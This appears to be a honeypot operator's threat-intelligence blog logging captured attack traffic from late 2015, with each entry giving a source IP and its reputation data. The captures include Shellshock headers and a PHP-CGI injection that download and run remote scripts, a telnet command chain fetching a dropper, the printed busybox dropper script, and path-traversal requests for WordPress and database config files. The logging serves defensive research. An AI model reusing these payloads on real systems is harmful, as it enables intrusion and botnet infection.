Saturday, 12 December 2015

173.193.232.34 - Shellshock code execution

BEGIN OF HTTP DATA:
2015-12-11 21:44:55
Source IP: 173.193.232.34
GET //cgi-bin/finger.cgi HTTP/1.1
Accept: */*
User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | md5sum"
GET //cgi-bin/test.cgi HTTP/1.1
GET //cgi-mod/index.cgi HTTP/1.1
GET //cgi-sys/defaultwebpage.cgi HTTP/1.1
GET //cgi-sys/entropysearch.cgi HTTP/1.1
GET //cgi-sys/realsignup.cgi HTTP/1.1
GET //cgi-bin/test-cgi HTTP/1.1
GET //cgi-bin/finger.cgi HTTP/1.1

173.193.232[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36351 SoftLayer Technologies Inc.

Wednesday, 9 December 2015

14.141.81.22 - multiple *.jsp GET attempts

BEGIN OF HTTP DATA:
2015-12-08 16:48:30
Source IP: 14.141.81.22
User-Agent: Wget/1.11.4 Red Hat modified
Accept: */*
GET /zmeu/zmeu.jsp HTTP/1.0
GET /iddqd/iddqd.jsp HTTP/1.0
GET /iesvc/iesvc.jsp HTTP/1.0
GET /wstats/wstats.jsp HTTP/1.0
GET /zecmd/zecmd.jsp HTTP/1.0
GET /idsvc/idsvc.jsp HTTP/1.0
GET /wincfg/wincfg.jsp HTTP/1.0


14.141.81[.]22

    Static Source: GeoIP data
  • Country: India
  • ASN: AS4755 TATA Communications formerly VSNL is Leading ISP
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/14.141.81.22

207.200.40.116 - GET db.php

BEGIN OF HTTP DATA:
2015-12-09 01:17:38
Source IP: 207.200.40.116
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.10-1ubuntu3.10
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

207.200.40[.]116

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS3728 Onramp Access Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/207.200.40.116

69.12.70.34 - GET db.php

BEGIN OF HTTP DATA:
2015-12-08 20:48:58
Source IP: 69.12.70.34
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

69.12.70[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS8100 QuadraNet, Inc
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/69.12.70.34
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.12.70.34

Sunday, 6 December 2015

103.238.131.21 - access attempt wp-config.php (traversal)

BEGIN OF HTTP DATA:
2015-12-06 01:42:29
Source IP: 103.238.131.21
GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
Host: 195.169.125.87
Connection: close


 END OF DATA

103.238.131[.]21

    Static Source: GeoIP data
  • Country: Australia
  • ASN: AS23352 Server Central Network
  • Remarks: This address range is in use by an agile cloud hosting environment.

Saturday, 5 December 2015

1.32.103.224 - Shellshock download via http://lliillii.altervista.org

BEGIN OF HTTP DATA:
2015-12-05 02:52:29
Source IP: 1.32.103.224
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

 END OF DATA
The server did not respond to my manual download attempt.

1.32.103[.]224

    Static Source: GeoIP data
  • Country: Malaysia
  • ASN: AS4788 TM Net, Internet Service Provider
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/1.32.103.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/1.32.103.224


Sunday, 29 November 2015

46.105.8.133 - Scanning host via Python-urllib

BEGIN OF HTTP DATA:
2015-11-29 11:01:38
Source IP: 46.105.8.133
GET / HTTP/1.1
Accept-Encoding: identity
Host: 109.234.106.8:8080
Connection: close
User-Agent: Python-urllib/2.7


 END OF DATA
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
GET / HTTP/1.1
GET /script HTTP/1.1
GET /jenkins/script HTTP/1.1
GET /hudson/script HTTP/1.1
GET /login HTTP/1.1
GET /jenkins/login HTTP/1.1
GET /hudson/login HTTP/1.1
GET /jmx-console HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /manager/html HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /msd HTTP/1.1
GET /mySqlDumper HTTP/1.1
GET /msd1.24stable HTTP/1.1
GET /msd1.24.4 HTTP/1.1
GET /mysqldumper HTTP/1.1
GET /MySQLDumper HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /phpmyadmin HTTP/1.1
GET /phpMyAdmin HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /myadmin HTTP/1.1
GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1
GET /phpMyAdmin-4.2.1-english HTTP/1.1
GET / HTTP/1.1
GET /sqlite/main.php HTTP/1.1
GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
GET /SQLiteManager-1.2.4/main.php HTTP/1.1
GET /sqlitemanager/main.php HTTP/1.1
GET /SQlite/main.php HTTP/1.1
GET /SQLiteManager/main.php HTTP/1.1

46.105.8[.]133

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.105.8.133
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analysis, the accessible site only showed an HTML page related to Google AdSense.

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>
 

Sunday, 1 November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
We have handled this sort of attack already in a previous blog post. The attack has not been seen since March.

195.182.136[.]198

    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS6858 Comlink Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.182.136.198

Feed search for 195.182.136[.]198

5.39.251[.]4

    Static Source: GeoIP data
  • Country: United Kingdom
  • ASN: AS30938 ahbr company limited
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/5.39.251.4

Feed search for 5.39.251[.]4


Saturday, 31 October 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

    Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12

Tuesday, 27 October 2015

222.186.21.181 - ORACLE DB access

BEGIN OF ORACLE DATA:
2015-10-27 00:48:15
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@l^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@2^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DATA=(COMMAND=status)(VERSION=169869568))
 END OF DATA

BEGIN OF ORACLE DATA:
2015-10-27 00:48:16
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@<D1>^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@<97>^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=dhaxxor))(COMMAND=status)(ARGUMENTS=64)(PASSWORD=dhaxxor)(SERVICE=LISTENER)(VERSION=135294976)))
 END OF DATA
I report this mainly because it was the first traffic found on the fake Oracle port, even though the user/password dhaxxor does not look like an honest attempt.

222.186.21[.]181

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/222.186.21.181
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/222.186.21.181
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Saturday, 24 October 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
testvc.it

Registrant
Organization: MADE TO SELL SRL
Address: VIA VITTORIO EMANUELE 33, CALENZANO

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78

185.93.185.47 - Shellshock ping to 212.47.238.143

BEGIN OF HTTP DATA:
2015-10-23 22:18:50
Source IP: 185.93.185.47
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close

212.47.238[.]143

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/212.47.238.143

Feed search for 212.47.238[.]143

185.93.185[.]47

    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS204209 Individual entrepreneur Tereschenko Marina Evgenievna
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.93.185.47
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/185.93.185.47

Feed search for 185.93.185[.]47

221.3.153.172 - Backdoor.Perl.Shellbot via http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158

Wednesday, 21 October 2015

74.94.108.29 - wp_woocommerce / virtuemart Cookie and Auth

BEGIN OF HTTP DATA:
2015-10-21 10:56:18
Source IP: 74.94.108.29
Country: US RiskScore: 1 Malware: []
GET http://ya.ru:80/ HTTP/1.1
Content-Type: text/html
Host: ya.ru
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic Og==
Cookie: nl-wag-lbsession=493641290.39121.584371104.3216573472; JSESSIONID=3F318DEF20EA379FF67AA05B51374618; 9db8b84e697d8de7acd04dee7393b60a=ae337258da9910c1feaf1f03b9df7725; wfvt_4053413342=56274d2d95c4e; CFTOKEN=98030C9E-58DE-4492-AAA47B1510FA5BF7; CFID=12366; ASPSESSIONIDQCAABTCD=PBIANEADMJBMMEHPKHPEKMAP; ASPSESSIONIDQASRRQRB=LCAABDADJPOGJALLBHMBGNBN; ASPSESSIONIDACACCQTS=BNGFBDADHOLOELKAMDJIFEME; ASPSESSIONIDCQTSABBT=CECMJGADBKMGLMCECPFLFPNN; ASPSESSIONIDAQDACTSD=AKIFDJDDAJNIJNAHIHELNJIB; X-Mapping-jfocjcpm=A58326710875159DFD1FE605A98F3A80; X-Mapping-ihnbadbn=8BEBCF55946DB931DDF1C87D24A0415C; X-Mapping-jdinjeol=FFDF3B29993B876585FCDFA9909EF15F; wp_shopp_bc38cde85b50c10d9bdebb0eb9193993=0ba9c5b80f14e3f69860cda7509a7077; site[currency]=Q2FrZQ%3D%3D.vETn; CmsDomain=ya.ru; incap_ses_199_81566=CowODjN5bwLj6hkOvh7DAvZKJ1YAAAAAB+BCoPnonUJVBYCp5xUKeQ==; incap_ses_407_81566=ZiaWKzMEIgHDhOlfWvSlBfVKJ1YAAAAAfo/1rHWeppqZ6cdvfuJygQ==; incap_ses_406_81566=VOYzJLd34ACTtwr062aiBfNKJ1YAAAAA5nUs9H2KvROsHSxk0yOoEg==;
 incap_ses_401_81566=1LbWZCya8SvkuymvnKOQBfVKJ1YAAAAAy8RJbgwe/Y9PBd7XDw6cGg==; incap_ses_120_81566=2RjJBLglW191UoOJbVOqAdJKJ1YAAAAAf1UQwaBqr5Q2wMpPHAQzaw==; incap_ses_261_81566=GZFGVnd3gXbLg9D+zkKfA9FKJ1YAAAAA2WcQTAGttQIVGqAIjg7fRg==; incap_ses_315_81566=x1z+JLhBoEOPMkXlOBtfBNBKJ1YAAAAAqbuqN5aJ+t3aC1WvABbnpw==; incap_ses_313_81566=/PXnYr1CfhNBs2r3LwBYBNBKJ1YAAAAA3TQ/Y6pEe9RAPouemwDbXg==; incap_ses_305_81566=RGA+XGM6xmecIhByTZQ7BM5KJ1YAAAAA3rjxLOTABAkf53cptw7paw==; incap_ses_288_81566=3Kc0cX2Hr3j8MJEq4i7/A8NKJ1YAAAAAAt+Y5yuHzk8KE/HuJXRI9g==; incap_ses_287_81566=w/wICF7G1GDzkOg8TKH7A79KJ1YAAAAAUL1px1Y01QJyJ/n/pGVI8A==; incap_ses_200_81566=OAVsNLkUm354oNE05YvGAqlKJ1YAAAAAxuJV8VYMtg3gV6RmKu1wew==; visid_incap_81566=8xGGpkYVRvilOCRZozp2W6lKJ1YAAAAAQUIPAAAAAADRL/a6/cPFkRp0rDsRnGWo; imp=S_n8yXBXBcel4PcTxg63NoDy6Loe610223Z0000Z0; ASPSESSIONIDSQTCSTCS=FKOFIBOCFBFEMNCGEPPIJDLF; bd45d1676dea992b2a6b94dd527b20c2=7011dcd6fd478fc235e3040e6a279ae1; virtuemart=36939bcb581af13e6e7823e25bad5880;
 d0c6e38cc40e095b29d8a68f70508dee=-; wp_woocommerce_session_fa8c6534742fba09c695479b86b3f50d=0e49327a58656322f9d7b3401f1d4603%7C%7C1445585631%7C%7C1445582031%7C%7C365c5ab325c06e102f5b29921898a4f2; uEUb_2132_lastact=1445412735%09forum.php%09; uEUb_2132_sid=InzUW5; uEUb_2132_lastvisit=1445409135; uEUb_2132_saltkey=YKpFR7pK; rg_cookie_session_id=549763849; PIWIK_SESSID=10361ae0ab110d2b93baf4907dde252d; corebb7bvisit=1445412063; GBALID=web01; ASPSESSIONIDSQBCDAQD=BHHHPNOABKBFDHFICLIHIFME; BIGipServerwww.agnis.net-HTTP=2493880074.20480.0000; EkAnalytics=0; EktGUID=66e92cf7-6a60-496f-aae8-11a40c0bac96; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=ya.ru&SiteLanguage=1033; CID=7ae028d37d407c5edcf586b3396dfcd75c48bed9s%3A40%3A%22d51ce68a4e9c6f58aa7ae28ce3b41bbd6e8738b1%22%3B; juSecondLang=fa; juFirstLang=en;
 PHPSESSID=c4fa633918d04c44e65d62eb7735adc8; ASPSESSIONIDQQRQRCDC=ILLFLNJDDBNCMELHLKFFGFBJ; Cacti=n1rek3j8pdj08nvj8bi6ot8dj5; ASP.NET_SessionId=3zc024ndj3yvajcyw5rw2vp1; .ASPXANONYMOUS=PB2ACGBC0QEkAAAAMjI2Mzg0OTMtYzk3My00NGE0LTkxYzgtZmE2MWUzY2U5MGUy--uyzTEzsohzI0t45c49Aeo2c2UuUsTfNVKkGB8VVk81; AIROS_SESSIONID=757da0eccfd2ab191585a35dd22cfde9; 1f9adce772dab79ce17b47eeff21ce20=3bc5dcaf79f897eeb113a3d87c756a55
Not to mention that this honeypot does not serve any content except "Hello World".

74.94.108[.]29

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS7922 Comcast Cable Communications, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/74.94.108.29


Monday, 19 October 2015

87.106.142.17 - Wordpress xmlrpc.php

BEGIN OF HTTP DATA:
2015-10-19 13:43:02
Source IP: 87.106.142.17
Country: DE RiskScore: 1 Malware: []
POST /xmlrpc.php HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>

87.106.142[.]17

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS8560 1&1 Internet AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/87.106.142.17

Thursday, 15 October 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

 END OF DATA
The first script is simply:
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also publicly available:
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is:
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share; the password is "infected".

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

Feed search for 158.69.203[.]229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158

Feed search for 113.126.198[.]158


Tuesday, 13 October 2015

186.56.42.11 - Shellshock attempt via 46.105.96.205

BEGIN OF HTTP DATA:
2015-10-13 07:26:22
Source IP: 186.56.42.11
Country: AR RiskScore: 10 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 46.105.96.205/TEST231;curl 46.105.96.205/TEST231;fetch 46.105.96.205/TEST231;lwp-download 46.105.96.205/TEST231;GET 46.105.96.205/TEST231");'
Host: 195.169.125.87
Connection: Close

46.105.96[.]205

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.105.96.205

186.56.42[.]11

    Static Source: GeoIP data
  • Country: Argentina
  • ASN: AS22927 Telefonica de Argentina
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/186.56.42.11
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/186.56.42.11
    Static Source: panwdbl.appspot.com
